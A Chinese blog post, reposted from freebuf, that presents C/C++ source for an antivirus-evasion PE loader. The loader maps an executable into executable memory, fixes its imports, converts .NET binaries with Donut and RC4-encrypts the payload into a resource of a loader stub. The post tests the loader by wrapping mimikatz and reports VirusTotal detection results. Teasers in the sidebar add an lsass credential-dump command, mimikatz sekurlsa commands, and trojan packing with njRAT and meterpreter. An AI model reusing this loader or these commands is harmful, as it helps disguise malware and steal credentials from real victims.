厉害!免杀任意EXE

最新推荐文章于 2024-08-05 17:47:43 发布
最新推荐文章于 2024-08-05 17:47:43 发布
阅读量3k 收藏 9
点赞数 1
分类专栏: 信息安全 文章标签: java 渗透测试 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44420143/article/details/118518140
版权

公粽号:黒掌
一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主!

PE文件

PE文件简述

PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE、DLL、OCX、SYS、COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接被执行,如DLL),这篇文章主要讲对EXE文件进行内存加载并运行的方法,代码实现,和完成一个GUI加载器工具的全过程。

文件结构

image

由上图可以

  1. Dos Header

    是用来兼容MS-DOS操作系统的,目的是当这个文件在MS-DOS上运行时提示一段文字,大部分情况下是:This program cannot be run in DOS mode. 还有一个目的,就是指明NT头在文件中的位置。

  2. NT Header

    包含windows PE文件的主要信息,其中包括一个‘PE’字样的签名,PE文件头(IMAGE_FILE_HEADER)和PE可选头(IMAGE_OPTIONAL_HEADER32)。

  3. Section Table

    是PE文件后续节的描述,windows根据节表的描述加载每个节。

  4. Section

    每个节实际上是一个容器,可以包含代码、数据等等,每个节可以有独立的内存权限,比如代码节默认有读/执行权限,节的名字和数量可以自己定义。

无论PE文件在磁盘中还是在内存中,都少不了地址的概念,理解以下几个概念很重要。

  • 虚拟地址(Virtual Address): 在一个程序运行起来的时候,会被加载到内存中,并且每个进程都有自己的4GB,这个4GB当中的某个位置叫做虚拟地址,由物理地址映射过来的,4GB的空间并没有全部被用到。
  • 基地址(Image Base):磁盘中的文件加载到内存当中的时候可以加载到任意位置,而这个位置就是程序的基址。EXE默认的加载基址是400000h,DLL文件默认基址是10000000h。需要注意的是基地址不是程序的入口点。
  • 相对虚拟地址(Relative Virtual Address):为了避免PE文件中有确定的内存地址,引入了相对虚拟地址的概念。RVA是在内存中相对与载入地址(基地址)的偏移量,所以你可以发现前三个概念的关系:虚拟地址 = 基地址 + 相对虚拟地址
  • 文件偏移地址(FOA):当PE文件储存在某个磁盘当中的时候,某个数据的位置相对于文件头的偏移量。
  • 入口点(OEP):首先明确一个概念就是OEP是一个相对虚拟地址(Relative Virtual Address),然后使用OEP + Image Base ==入口点的虚拟地址(Virtual Address),通常情况下,OEP指向的程序真实的入口点,而不是main函数。

执行流程

这里有大佬做的windows执行PE文件全流程图,下面是地址:

https://github.com/corkami/pics/blob/master/binary/pe101/pe101l.png

image

大概流程如下:

  1. 加载PE文件:判断是否为PE文件,然后将要加载的文件读取到内存中,并且对齐。image
  2. 进行重定位:如果当前加载到内存当中的基址与Option Header的Image Base一样,即在理想基址中展开了,或重定位表data[5]的长度为0,则不需要重定位。重定位表的sizeOfBlock是加上块头部8字节的大小。重定位元素也很简单,以WORD为单位,但要注意高4位为0x3才有效,修复重定位表时要检查该位是否有效。image
  3. 构建导入表:通过偏移+内存基址,获取导入表第一个dll的数据,按照导入的dll逐个遍历,直到当前导入表的OriginalFirstThunk为0,即遍历完毕。

image

PE加载器

PE加载器,就是将一个PE文件映射到自己的内存,然后启动其main函数运行程序。一个PELoader的实现,需要有几个注意点:内存对齐,修复IAT表,修复重定位表,将内存属性改为可执行。

内存对齐

根据exe文件在加载到内存中对齐粒度进行对齐

LPVOID MapImageToMemory(LPVOID base_addr)
{

	LPVOID mem_image_base = NULL;
	PIMAGE_DOS_HEADER raw_image_base = (PIMAGE_DOS_HEADER)base_addr;
	FuVirtualAlloc MyVirtualAlloc = (FuVirtualAlloc)GetProcAddress(hKernel32, "VirtualAlloc");
	
	if (IMAGE_DOS_SIGNATURE != raw_image_base->e_magic)
	{
		return NULL;
	}
	
	PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(raw_image_base->e_lfanew + (UINT_PTR)raw_image_base);
	if (IMAGE_NT_SIGNATURE != nt_header->Signature)
	{
		return NULL;
	}
	
	if (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
	{
		return NULL;
	}
	
	PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)(raw_image_base->e_lfanew + sizeof(*nt_header) + (UINT_PTR)raw_image_base);
	
	mem_image_base = MyVirtualAlloc((LPVOID)(nt_header->OptionalHeader.ImageBase), nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	
	if (NULL == mem_image_base)
	{
		mem_image_base = MyVirtualAlloc(NULL, nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	}
	
	if (NULL == mem_image_base)
	{
		return NULL;
	}
	
	memcpy(mem_image_base, (LPVOID)raw_image_base, nt_header->OptionalHeader.SizeOfHeaders);
	
	for (int i = 0; i < nt_header->FileHeader.NumberOfSections; i++)
	{
		memcpy((LPVOID)(section_header->VirtualAddress + (UINT_PTR)mem_image_base), (LPVOID)(section_header->PointerToRawData + (UINT_PTR)raw_image_base), section_header->SizeOfRawData);
		section_header++;
	}
	return mem_image_base;
}

修复IAT表

根据PE结构的导入表,加载所需的dll,并获取导入函数的地址并写入导入表中

VOID FixImageIAT(PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header)
{
	DWORD op;
	DWORD iat_rva;
	SIZE_T iat_size;
	HMODULE import_base;
	PIMAGE_THUNK_DATA thunk;
	PIMAGE_THUNK_DATA fixup;
	PIMAGE_IMPORT_DESCRIPTOR import_table = (PIMAGE_IMPORT_DESCRIPTOR)(nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (UINT_PTR)dos_header);

	DWORD iat_loc = (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress) ? IMAGE_DIRECTORY_ENTRY_IAT : IMAGE_DIRECTORY_ENTRY_IMPORT;
	
	iat_rva = nt_header->OptionalHeader.DataDirectory[iat_loc].VirtualAddress;
	iat_size = nt_header->OptionalHeader.DataDirectory[iat_loc].Size;
	
	LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
	
	FuVirtualProtect myVirtualProtect = (FuVirtualProtect)GetProcAddress(hKernel32, "VirtualProtect");
	FuLoadLibraryA myLoadLibraryA = (FuLoadLibraryA)GetProcAddress(hKernel32, "LoadLibraryA");
	
	myVirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
	
	while (import_table->Name)
	{
		import_base = myLoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
		fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
		if (import_table->OriginalFirstThunk)
		{
			thunk = (PIMAGE_THUNK_DATA)(import_table->OriginalFirstThunk + (UINT_PTR)dos_header);
		}
		else
		{
			thunk = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
		}
		while (thunk->u1.Function)
		{
			PCHAR func_name;
			if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64)
			{
				fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, (LPCSTR)(thunk->u1.Ordinal & 0xFFFF));
			}
			else
			{
				func_name = (PCHAR)(((PIMAGE_IMPORT_BY_NAME)(thunk->u1.AddressOfData))->Name + (UINT_PTR)dos_header);
				fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, func_name);
			}
			fixup++;
			thunk++;
		}
		import_table++;
	}
	return;

}

修复重定位表

直接申请当前exe的ImageBase地址,如果加载到内存当中的基址与Option Header的Image Base一样,就相当于在理想基址中展开,不需要修复重定位表。但是这种方法一般用于x64的程序,因为x86程序的Image Base较低,被占用导致无法正常执行的几率很高。

mem_image_base = MyVirtualAlloc((LPVOID)(nt_header->OptionalHeader.ImageBase), nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (NULL == mem_image_base)
{
	mem_image_base = MyVirtualAlloc(NULL, nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}

判断C#程序

可以通过DataDirectory的第15项,IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR中VirtualAddress是否为空,来判断是否为C#程序,如果是C#程序,程序使用了Donut项目将C#程序转换为shellcode,Donut是一个shellcode生成工具,它可以从.NET程序集中创建与位置无关的shellcode payloads。此shellcode可用于将程序集注入任意Windows进程。给定一个任意.NET程序集,参数和入口点(如Program.Main),Donut就可为我们生成一个与位置无关的shellcode,并从内存加载它。项目地址如下:

https://github.com/TheWover/donut

判断是否为PE程序,并且判断程序位数以及是否为C#程序:

int CMFCLoaderDlg::checkBit(TCHAR* filePath,int& BIT,int& TYPE)
{
	IMAGE_DOS_HEADER myDosHeader;
	IMAGE_NT_HEADERS myNTHeader;
	IMAGE_NT_HEADERS64 myNTHeader64;

	LONG e_lfanew;
	errno_t err;
	FILE* pfile = NULL;
	
	if ((err = _wfopen_s(&pfile, filePath, L"rb")) != 0)
	{
		MessageBox(_T("File open error!"), NULL, MB_ICONERROR);
		return 0;
	}
	fread(&myDosHeader, 1, sizeof(IMAGE_DOS_HEADER), pfile);
	if (myDosHeader.e_magic != 0x5A4D)
	{
		MessageBox(_T("Not a PE file!"), NULL, MB_ICONERROR);
		fclose(pfile);
		return 0;
	}
	e_lfanew = myDosHeader.e_lfanew;
	fseek(pfile, e_lfanew, SEEK_SET);
	fread(&myNTHeader, 1, sizeof(IMAGE_NT_HEADERS), pfile);
	switch (myNTHeader.FileHeader.Machine)
	{
		case 0x014c:
		{
			BIT = 32;
			if (myNTHeader.OptionalHeader.DataDirectory[0x0e].VirtualAddress)
			{
				TYPE = 1;
			}
			break;
		}
	
		case 0x8664:
		{
			BIT = 64;
			fseek(pfile, e_lfanew, SEEK_SET);
			fread(&myNTHeader64, 1, sizeof(IMAGE_NT_HEADERS64), pfile);
			
			if (myNTHeader64.OptionalHeader.DataDirectory[0x0e].VirtualAddress)
			{
				TYPE = 1;
			}
			break;
		}
		default:
			break;
	}


	return 0;

}

程序加密

使用了R.C.4加密算法,将要加载的PE文件加密并存放在资源段中,这种方法其实免杀效果并不好,接下来可以考虑其他将Loader和payload分离的其他方法。

int commanMake(TCHAR* filePath, TCHAR* outfilePath, int BIT)
{
	TCHAR* DATfilename;
	if (BIT == 32)
	{
		DATfilename = L"x32PEloader.DAT";
	}
	else if (BIT == 64)
	{
		DATfilename = L"x64PEloader.DAT";
	}
	else
	{
		return 0;
	}

	HANDLE hPE = CreateFile(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hPE == INVALID_HANDLE_VALUE)
	{
		wprintf(L"[!]  Unable to Open FIle %s\n", filePath);
		CloseHandle(hPE);
		return 0;
	}
	unsigned char* key = GeneratePassword(128);
	
	int peSize = GetFileSize(hPE, NULL);
	PBYTE shellcode = (PBYTE)malloc(peSize + StreamKeyLenth);
	if (shellcode == NULL)
	{
		return 0;
	}
	memcpy(shellcode, key, StreamKeyLenth);
	DWORD lpNumberOfBytesRead;
	PWCHAR fileName = outfilePath;
	int ret = ReadFile(hPE, shellcode + StreamKeyLenth, peSize, &lpNumberOfBytesRead, NULL);
	if (ret == 0)
	{
		return 0;
	}
	StreamCrypt(shellcode + StreamKeyLenth, peSize, key, StreamKeyLenth);
	
	if (CopyFile(DATfilename, fileName, FALSE) == 0)
	{
		wprintf(L"[!]  Unable to Open FIle PEloader.DAT\n");
		return 0;
	}
	
	HANDLE  hResource = BeginUpdateResource(fileName, FALSE);
	
	if (NULL != hResource)
	{
		if (UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(404), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPVOID)shellcode, peSize + sizeof(key)) != FALSE)
		{
			EndUpdateResource(hResource, FALSE);
			wprintf(L"[+]  Successfully generated %s\n", fileName);
		}
	}
	free(shellcode);
	CloseHandle(hPE);
	return 1;

}

成品效果

对x64的mimikatz进行加载器生成,功能正常。

image

上传VT结果,免杀效果还凑活,需要继续改进。稍后相关代码及工具上传至知识星球。

image

参考文章和项目

https://blog.csdn.net/kclax/article/details/93727011

https://bbs.pediy.com/thread-249133.htm

https://github.com/TheWover/donut

https://www.cnblogs.com/onetrainee/p/12938085.html

来源:freebuf.com

作者:宽字节

扫码领取黑客大礼包
今天的分享就到这里,喜欢的小伙伴记得一键三连,我有一个公粽号【黒掌】, 可以免费获取更多黑客秘籍,欢迎来耍!

是叶十三
关注
专栏目录
exe文件,后门免杀的制作学习笔记
我的学习笔记
02-28 3254
引用原文!!注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。需要(Framework),一般Windows环境都有,C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exemsfvenom -p windows/meterpreter/revers...
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1271
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
绕过杀软(二)——免杀exe文件(360、火绒免杀
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
简单的免杀方法(基本知识)
最新发布
2301_77472496的博客
08-05 994
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后。
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1764
1.将工具exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
免杀exe技术探讨
goddemon
07-19 1187
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近把大部分的语言的捣鼓分析了下c的python的rust的go的常见的语言市面上有的都研究了下也写了一下自己的发觉python的确实可以说是最简单的了,不过其实深入免杀的话还是得进程注入走ring0层去对抗杀软,不然单纯的静态过了终究有些行为还是会呗动态杀这篇分享一篇python的吧效果看正文全过的也有不过现在肯定是不会发的。...
微软自带签名exe免杀dump hash
weixin_44747030的博客
04-16 1348
微软签名DumpMinitool.exe免杀dump hash 微软签名的exe dump lsass进程 DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full --file 保存文件名为1.txt 规避一下杀软 --processId lsass.exe 进程号 杀软无拦截 查看1.dmp sekurlsa::minidump "1.dmp" sekurlsa::logonpasswords 参考文章:https://
对powershell的一次免杀
Hungchuiho的博客
11-20 4248
powershell介绍 powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。 powershell存在六种执行策略: Unrestricted 权限最高,可以不受限制执行任意脚本 Rest
PE文件结构详解 --(完整版)
墨鱼菜鸡
07-11 6510
From:https://blog.csdn.net/adam001521/article/details/84658708 PE结构详解:https://www.cnblogs.com/zheh/p/4008268.html PE格式解析-区段表及导入表结构详解:https://blog.csdn.net/qq_30145355/article/d...
攻击防范六(整理)
热门推荐
民兵的家园
06-20 2万+
八种扫描器说明八种扫描器说明⑴NSS(网络安全扫描器) NSS由Perl语言编成,它最根本的价值在于它的速度,它运行速度非常快,它可以执行下列常规检查: ■Sendmail ■匿名FTP ■NFS出口 ■TFTP ■Hosts.equiv ■Xhost 注:除非你拥有最高特权,否则NSS不允许你执行Hosts.equiv。 利用NSS,用户可以增加更强大的功能,其中包括: ■AppleTalk扫描
VB速查大全(数据库、表格及报表编程) ★ VB错误处理,ado常见错误,VB数据类型等,网上有很多教程是错的,强烈建议看此文
ecz00的专栏
05-19 8025
VB异常处理 (很重要) ado常见错误 ado游标及锁定介绍 免费报表控件 免费表格控件 vb数据类型(很多程序出问题出在这个,一定要看,VB msdn说的不太对) VB可用的AES加密sqlite_odbc 及 cairo_sqlite (VBRichClient自带的非odbc连接) 有vbRichClient代替winsock、实现vb多线程及远程调用activeX等
最新方法免杀所有杀软.exe
10-11
最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe最新方法免杀所有杀软.exe
最强的免杀软件工具
12-10
最强的免杀软件工具
lcx.exe最新免杀
12-20
最新免杀的转发工具,如果不行请自主免杀.....
强大的免杀工具,绝对震撼你!!!!
09-09
exe转jpg的工具,而且右键看属性也是jpg格式的,可别做坏事啊!!
最新最强免杀下载者,定制QQ44927268
01-06
最新免杀下载者,需要定制的联系我!需要定制的朋友联系我吧44927268
exe免杀宝典 #exe免杀 #Python打包exe
xiaozhao_666的博客
05-19 1558
exe免杀毒教程 目录 exe免杀毒教程 引子 准备和配置 方法 引子 上次我不是做了个打包exe文件的教程吗(没看点这里),结果装360的时候出了点状况,文件GG了 我太难了 于是我突发奇想,绞尽脑汁的去想如何做到Python转exe免杀毒 准备和配置 这个方法测试时情况如下 时间:2022.5.19 使用包:pyinstaller 测试软件:360杀毒,360安全卫士,火绒(没全装好) 程序编译软件:PyCharm Community Edition 2022.1.
通用exe编程免杀[转贴]
mAKER's Blog
11-10 1911
01  //修改过的可执行程序以资源的形式添加到另外一个正常的可执行程序中 02  BOOL Deformation(CString strRstFile,CString strDstFile) 03  { 04          CFile file; 05          BYTE *rstdata; 06          DWORD dwLen; 07          HANDLE hUpdateRes; 08          BOOL
Pyinstaller生成exe文件免杀
xiaoxianerqq的专栏
02-04 1531
0x01 解决方案 之前用python打包的exe文件总会被电脑关键识别成木马文件隔离,很困扰 (虽说本来也不是做什么好事= =) 解决方案: 再生成exe文件时给生成的exe加上图标即可。 使用命令: pyinstaller -i xxxx.ico -w -F xxxx.py 0x02 ico文件生成代码 pyinstaller需要特定的后缀为.ico的图片文件来生成图标, 且对文件的大小尺寸有要求。经过查询,以下方法可以顺利生成各种大小的图标 首先安装PIL库 #fo...
输入任意整数n,求n!
03-28
可以使用循环来计算n!,即从1到n依次相乘。具体实现如下: ```python n = int(input("请输入一个整数:")) fact = 1 for i in range(1, n+1): fact *= i print(n, "! = ", fact) ``` 其中,变量fact用来存储阶乘的值,初始化为1,因为任何数乘以1都等于它本身。然后使用for循环从1到n依次相乘,每次将结果累加到fact变量中。最后输出结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值